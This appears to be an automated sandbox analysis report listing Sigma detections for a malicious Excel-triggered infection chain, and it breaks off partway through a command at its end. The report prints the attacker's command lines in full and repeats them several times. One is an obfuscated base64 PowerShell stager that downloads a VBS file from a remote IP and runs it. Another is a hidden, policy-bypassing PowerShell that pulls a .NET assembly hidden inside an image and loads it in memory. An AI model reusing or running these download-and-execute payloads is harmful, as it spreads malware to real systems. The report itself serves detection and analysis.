iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3912, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS" , ProcessId: 3104, ProcessName: wscript.exe
                  Sigma detected: Change PowerShell Policies to an Insecure Level
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
                  Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3912, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.cmdline", ProcessId: 4012, ProcessName: csc.exe
                  Sigma detected: Excel Network Connections
                  Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 88.99.66.38, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3528, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
                  Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                  Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3912, TargetFilename: C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS
                  Sigma detected: Suspicious Office Outbound Connections
                  Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3528, Protocol: tcp, SourceIp: 88.99.66.38, SourceIsIpv6: false, SourcePort: 443
                  Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ?
                  Sigma detected: Usage Of Web Request Commands And Cmdlets
                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ?
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3912, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS" , ProcessId: 3104, ProcessName: wscript.exe
                  Sigma detected: Dynamic CSharp Compile Artefact
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3912, TargetFilename: C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.cmdline
                  Sigma detected: Modification of IE Registry Settings
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3528, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))", CommandLine: poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; 